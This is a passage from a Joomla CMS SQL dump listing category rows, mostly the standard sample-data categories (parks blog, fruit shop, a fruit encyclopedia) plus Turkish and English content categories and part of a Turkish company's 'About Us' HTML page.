00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:11:56',0,'*',1),(26,51,14,40,49,2,'sample-data-articles/park-site','com_content','Park Site','park-site','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'en-GB',1),(27,52,26,41,42,3,'sample-data-articles/park-site/park-blog','com_content','Park Blog','park-blog','','<p><span style=\"font-size: 12px;\">Here is where I will blog all about the parks of Australia.</span></p>\r\n<p><em>You can make a blog on your website by creating a category to write your blog posts in (this one is called Park Blog). Each blog post will be an article in that category. If you make a category blog menu link with 1 column it will look like this page, if you display the category description then this part is displayed. </em></p>\r\n<p><em>To enhance your blog you may want to add extensions for <a href=\"http://extensions.joomla.org/extensions/contacts-and-feedback/articles-comments\" style=\"color: #1b57b1; text-decoration: none; font-weight: normal;\">comments</a>,<a href=\"http://extensions.joomla.org/extensions/social-web\" style=\"color: #1b57b1; text-decoration: none; font-weight: normal;\"> interacting with social network sites</a>, <a href=\"http://extensions.joomla.org/extensions/content-sharing\" style=\"color: #1b57b1; text-decoration: none; font-weight: normal;\">tagging</a>, and <a href=\"http://extensions.joomla.org/extensions/content-sharing\" style=\"color: #1b57b1; text-decoration: none; font-weight: normal;\">keeping in contact with your readers</a>. You can also enable the syndication that is included in Joomla (in the Integration Options set Show Feed Link to Show and make sure to display the syndication module on the page).</em></p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"images\\/sampledata\\/parks\\/banner_cradle.jpg\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:15:40',0,'en-GB',1),(28,53,26,43,48,3,'sample-data-articles/park-site/photo-gallery','com_content','Photo Gallery','photo-gallery','','<p><img src=\"images/sampledata/parks/banner_cradle.jpg\" border=\"0\" /></p>\r\n<p>These are my photos from parks I have visited (I didn\'t take them, they are all from <a href=\"http://commons.wikimedia.org/wiki/Main_Page\">Wikimedia Commons</a>).</p>\r\n<p><em>This shows you how to make a simple image gallery using articles in com_content. </em></p>\r\n<p><em>In each article put a thumbnail image before a \"readmore\" and the full size image after it. Set the article to Show Intro Text: Hide. </em></p>',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'en-GB',1),(29,54,14,50,55,2,'sample-data-articles/fruit-shop-site','com_content','Fruit Shop Site','fruit-shop-site','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'*',1),(30,55,29,51,52,3,'sample-data-articles/fruit-shop-site/growers','com_content','Growers','growers','','<p>We search the whole countryside for the best fruit growers.</p>\r\n<p><em>You can let each supplier have a page that he or she can edit. To see this in action you will need to create a user who is in the suppliers group.  </em></p>\r\n<p><em>Create one page in the growers category for that user and make that supplier the author of the page. That user will be able to edit his or her page. </em></p>\r\n<p><em>This illustrates the use of the Edit Own permission. </em></p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:17:40',0,'*',1),(31,56,18,2,3,2,'sample-data-weblinks/park-links','com_weblinks','Park Links','park-links','','<p>Here are links to some of my favorite parks.</p>\r\n<p><em>The weblinks component provides an easy way to make links to external sites that are consistently formatted and categorised. You can create weblinks from the front end of your site.</em></p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"images\\/sampledata\\/parks\\/banner_cradle.jpg\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'en-GB',1),(32,57,18,4,7,2,'sample-data-weblinks/joomla-specific-links','com_weblinks','Joomla! Specific Links','joomla-specific-links','','<p>A selection of links that are all related to the Joomla Project.</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:32:00',0,'*',1),(33,58,32,5,6,3,'sample-data-weblinks/joomla-specific-links/other-resources','com_weblinks','Other Resources','other-resources','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(34,59,16,64,65,2,'sample-data-contact/park-site','com_contact','Park Site','park-site','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'en-GB',1),(35,60,16,66,123,2,'sample-data-contact/shop-site','com_contact','Shop Site','shop-site','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(36,61,35,67,68,3,'sample-data-contact/shop-site/staff','com_contact','Staff','staff','','<p>Please feel free to contact our staff at any time should you need assistance.</p>',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(37,62,35,69,122,3,'sample-data-contact/shop-site/fruit-encyclopedia','com_contact','Fruit Encyclopedia','fruit-encyclopedia','','<p> </p><p>Our directory of information about different kinds of fruit.</p><p>We love fruit and want the world to know more about all of its many varieties.</p><p>Although it is small now, we work on it whenever we have a chance.</p><p>All of the images can be found in <a href=\"http://commons.wikimedia.org/wiki/Main_Page\">Wikimedia Commons</a>.</p><p><img src=\"images/sampledata/fruitshop/apple.jpg\" border=\"0\" alt=\"Apples\" title=\"Apples\" /></p><p><em>This encyclopedia is implemented using the contact component, each fruit a separate contact and a category for each letter. A CSS style is used to create the horizontal layout of the alphabet headings. </em></p><p><em>If you wanted to, you could allow some users (such as your growers) to have access to just this category in the contact component and let them help you to create new content for the encyclopedia.</em></p><p> </p>',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(38,63,37,70,71,4,'sample-data-contact/shop-site/fruit-encyclopedia/a','com_contact','A','a','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(39,64,37,72,73,4,'sample-data-contact/shop-site/fruit-encyclopedia/b','com_contact','B','b','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(40,65,37,74,75,4,'sample-data-contact/shop-site/fruit-encyclopedia/c','com_contact','C','c','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(41,66,37,76,77,4,'sample-data-contact/shop-site/fruit-encyclopedia/d','com_contact','D','d','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(42,67,37,78,79,4,'sample-data-contact/shop-site/fruit-encyclopedia/e','com_contact','E','e','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(43,68,37,80,81,4,'sample-data-contact/shop-site/fruit-encyclopedia/f','com_contact','F','f','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(44,69,37,82,83,4,'sample-data-contact/shop-site/fruit-encyclopedia/g','com_contact','G','g','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(45,70,37,84,85,4,'sample-data-contact/shop-site/fruit-encyclopedia/h','com_contact','H','h','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(46,71,37,86,87,4,'sample-data-contact/shop-site/fruit-encyclopedia/i','com_contact','I','i','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(47,72,37,88,89,4,'sample-data-contact/shop-site/fruit-encyclopedia/j','com_contact','J','j','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(48,73,37,90,91,4,'sample-data-contact/shop-site/fruit-encyclopedia/k','com_contact','K','k','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(49,74,37,92,93,4,'sample-data-contact/shop-site/fruit-encyclopedia/l','com_contact','L','l','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(50,75,37,94,95,4,'sample-data-contact/shop-site/fruit-encyclopedia/m','com_contact','M','m','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(51,76,37,96,97,4,'sample-data-contact/shop-site/fruit-encyclopedia/n','com_contact','N','n','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(52,77,37,98,99,4,'sample-data-contact/shop-site/fruit-encyclopedia/o','com_contact','O','o','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(53,78,37,100,101,4,'sample-data-contact/shop-site/fruit-encyclopedia/p','com_contact','P','p','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(54,79,37,102,103,4,'sample-data-contact/shop-site/fruit-encyclopedia/q','com_contact','Q','q','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(55,80,37,104,105,4,'sample-data-contact/shop-site/fruit-encyclopedia/r','com_contact','R','r','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(56,81,37,106,107,4,'sample-data-contact/shop-site/fruit-encyclopedia/s','com_contact','S','s','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(57,82,37,108,109,4,'sample-data-contact/shop-site/fruit-encyclopedia/t','com_contact','T','t','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(58,83,37,110,111,4,'sample-data-contact/shop-site/fruit-encyclopedia/u','com_contact','U','u','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(59,84,37,112,113,4,'sample-data-contact/shop-site/fruit-encyclopedia/v','com_contact','V','v','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(60,85,37,114,115,4,'sample-data-contact/shop-site/fruit-encyclopedia/w','com_contact','W','w','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(61,86,37,116,117,4,'sample-data-contact/shop-site/fruit-encyclopedia/x','com_contact','X','x','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(62,87,37,118,119,4,'sample-data-contact/shop-site/fruit-encyclopedia/y','com_contact','Y','y','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(63,88,37,120,121,4,'sample-data-contact/shop-site/fruit-encyclopedia/z','com_contact','Z','z','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(64,93,22,15,16,5,'sample-data-articles/joomla/extensions/modules/articles-modules','com_content','Content Modules','articles-modules','','<p>Content modules display article and other information from the content component.</p>',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'*',1),(65,94,22,17,18,5,'sample-data-articles/joomla/extensions/modules/user-modules','com_content','User Modules','user-modules','','<p>User modules interact with the user system, allowing users to login, show who is logged-in, and showing the most recently registered users.</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:00:50',0,'*',1),(66,95,22,19,20,5,'sample-data-articles/joomla/extensions/modules/display-modules','com_content','Display Modules','display-modules','','<p>These modules display information from components other than content and user. These include weblinks, news feeds and the media manager.</p>',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(67,96,22,21,22,5,'sample-data-articles/joomla/extensions/modules/utility-modules','com_content','Utility Modules','utility-modules','','<p>Utility modules provide useful functionality such as search, syndication and statistics.</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:01:34',0,'*',1),(68,97,23,31,32,5,'sample-data-articles/joomla/extensions/templates/atomic','com_content','Atomic','atomic','','<p><img src=\"templates/atomic/template_thumbnail.png\" border=\"0\" alt=\"The Atomic Template\" style=\"border: 0; float: right;\" /></p>\r\n<p>Atomic is a minimal template designed to be a skeleton for making your own template and to learn about Joomla! templating.</p>\r\n<ul>\r\n<li><a href=\"index.php?Itemid=285\">Home Page</a></li>\r\n<li><a href=\"index.php?Itemid=316\">Typography</a></li>\r\n</ul>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:08:16',0,'*',1),(69,98,23,27,28,5,'sample-data-articles/joomla/extensions/templates/beez-20','com_content','Beez 20','beez-20','','<p><img src=\"templates/beez_20/template_thumbnail.png\" border=\"0\" alt=\"Beez_20 thumbnail\" align=\"right\" style=\"float: right;\" /></p>\r\n<p>Beez 2.0 is a versatile, easy to customise template that works for a variety of sites. It meets major accessibility standards and demonstrates a range of css and javascript techniques. It is the default template that installs with Joomla!</p>\r\n<ul>\r\n<li><a href=\"index.php?Itemid=424\">Home Page</a></li>\r\n<li><a href=\"index.php?Itemid=423\">Typography</a></li>\r\n</ul>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'*',1),(70,99,23,29,30,5,'sample-data-articles/joomla/extensions/templates/beez-5','com_content','Beez 5','beez-5','','<p><img src=\"templates/beez5/template_thumbnail.png\" border=\"0\" alt=\"Beez5 Thumbnail\" align=\"right\" style=\"float: right;\" /></p>\r\n<p>Beez 5 is an html5 implementation of a Joomla! template. It uses a number of html5 techniques to enhance the presentation of a site. It is used as the template for the Fruit Shop sample site.</p>\r\n<ul>\r\n<li><a href=\"index.php?Itemid=458\">Home Page</a></li>\r\n<li><a href=\"index.php?Itemid=457\">Typography</a></li>\r\n</ul>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:06:57',0,'*',1),(72,108,28,44,45,4,'sample-data-articles/park-site/photo-gallery/animals','com_content','Animals','animals','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'en-GB',1),(73,109,28,46,47,4,'sample-data-articles/park-site/photo-gallery/scenery','com_content','Scenery','scenery','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'en-GB',1),(75,166,22,23,24,5,'sample-data-articles/joomla/extensions/modules/navigation-modules','com_content','Navigation Modules','navigation-modules','','<p>Navigation modules help your visitors move through your site and find what they need.</p>\r\n<p>Menus provide your site with structure and help your visitors navigate your site.  Although they are all based on the same menu module, the variety of ways menus are used in the sample data show how flexible this module is.</p>\r\n<p>A menu can range from extremely simple (for example the top menu or the menu for the Australian Parks sample site) to extremely complex (for example the About Joomla! menu with its many levels). They can also be used for other types of presentation such as the site map linked from the \"This Site\" menu.</p>\r\n<p>Breadcrumbs provide users with information about where they are in a site.</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'*',1),(76,167,29,53,54,3,'sample-data-articles/fruit-shop-site/recipes','com_content','Recipes','recipes','','<p>Customers and suppliers can post their favorite recipes for fruit here.</p>\r\n<p>A good idea is to promote the use of metadata keywords to make finding other recipes for the same fruit easier.</p>\r\n<p><em>To see this in action, create a user assigned to the customer group and a user assigned to the suppliers group. These users will be able to create their own recipe pages and edit those pages. They will not be able to edit other users\' pages.</em><br /><br /></p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',42,'2011-12-27 12:18:25',0,'*',1),(77,169,1,133,134,1,'uncategorised','com_users','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',676,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(78,177,1,135,140,1,'turkish-tr','com_content','Turkish (TR)','turkish-tr','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2014-08-01 08:05:42',0,'0000-00-00 00:00:00',0,'tr-TR',1),(79,178,1,141,146,1,'english-uk','com_content','English (UK)','english-uk','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2014-08-01 08:06:01',0,'0000-00-00 00:00:00',0,'en-GB',1),(80,179,78,136,139,2,'turkish-tr/turkish-content','com_content','Turkish Content','turkish-content','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2014-08-01 08:06:29',0,'0000-00-00 00:00:00',0,'tr-TR',1),(81,180,79,142,145,2,'english-uk/english-content','com_content','English Content','english-content','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',676,'2014-08-01 08:07:26',0,'0000-00-00 00:00:00',0,'en-GB',1),(82,181,80,137,138,3,'turkish-tr/turkish-content/about-us','com_content','About Us','about-us','','<h4 style=\"margin: 2px; padding: 2px; font-size: 1.1em; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; background-color: #99aadd;\"><span style=\"margin: 0px; padding: 0px; text-decoration: underline;\">Vizyon</span></h4>\r\n<p style=\"margin: 4px; padding: 4px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">İş hacmi, bilgi ve kaliteyi sürekli arttırarak, ana çalışma konularında sektördeki en iyi firma olmaktÄ±r.</p>\r\n<h4 style=\"margin: 2px; padding: 2px; font-size: 1.1em; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; background-color: #99aadd;\"><span style=\"margin: 0px; padding: 0px; text-decoration: underline;\">Misyon</span></h4>\r\n<p style=\"margin: 4px; padding: 4px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">Türkiye\'de Elektronik Üreticiler için Güvenilir ve Uzun-vadeli işbirlikleri ile en ileri ve modern teknolojileri Komple Fabrika Otomasyon çözümleri olarak sunmaktÄ±r.</p>\r\n<h4 style=\"margin: 2px; padding: 2px; font-size: 1.1em; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; background-color: #99aadd;\"><span style=\"margin: 0px; padding: 0px; text-decoration: underline;\">İlkelerimiz</span></h4>\r\n<p style=\"margin: 4px; padding: 4px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\"> </p>\r\n<ul style=\"margin: 10px; padding: 2px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Konumuzda uzmanız. <br style=\"margin: 0px; padding: 0px;\" />Üretim konularında ihtiyaçlara tümüyle cevap verebilecek teknik bilgiye sahibiz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Güveniliriz. <br style=\"margin: 0px; padding: 0px;\" />Herkes 3S\'in yazılı olmasa bile sözlerini tutacağını ve faaliyetlerinde sıkıntı yaşamayacağını bilir.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Farklıyız. <br style=\"margin: 0px; padding: 0px;\" />Standart ürün ve hizmetlerde bile 3S\'in tercih nedeni olmasını sağlayacak bir fark yaratmaya çalışmaktayız.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Hızlıyız. <br style=\"margin: 0px; padding: 0px;\" />Hem müşterilerin ihtiyaçlarını karşılamada hem de şirket içi karar vermede geç olmadan uygulamaya geçeriz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Saygılıyız. <br style=\"margin: 0px; padding: 0px;\" />Şartlar ne olursa olsun, içeride ve dışarıda sosyal saygı kuralları içinde hareket ederiz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Olumluyuz. <br style=\"margin: 0px; padding: 0px;\" />Gelecekten umutluyuz. İleriye bakarken öncelikle engelleri değil, fırsat ve olanakları görürüz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">Kararlı ve Sabırlıyız. <br style=\"margin: 0px; padding: 0px;\" />Alınan kararların uygulamasında sabırlı ve gayretliyiz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 2px; padding: 2px; font-size: 1em;\">İşbirlikçiyiz. <br style=\"margin: 0px; padding: 0px;\" />Hedeflerimize tek başına ulaşamayız. Bunun için tedarikçi ve müşterilerimizle ortak bir çalışma içinde ortak anlayışla ilerlememiz gerektiğinin farkındayız.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"margin: 10px; padding: 2px; color: #000066; font-family: \'Segoe UI\', Tahoma, \'Trebuchet MS\', Arial, Verdana, Helvetica, sans-serif; line-height: 15.600000381469727px; background-color: #99aadd;\">\r\n<li style=\"margin: 0px 0px 0px 10px; padding: 0px;\">\r\n<h5 style=\"margin: 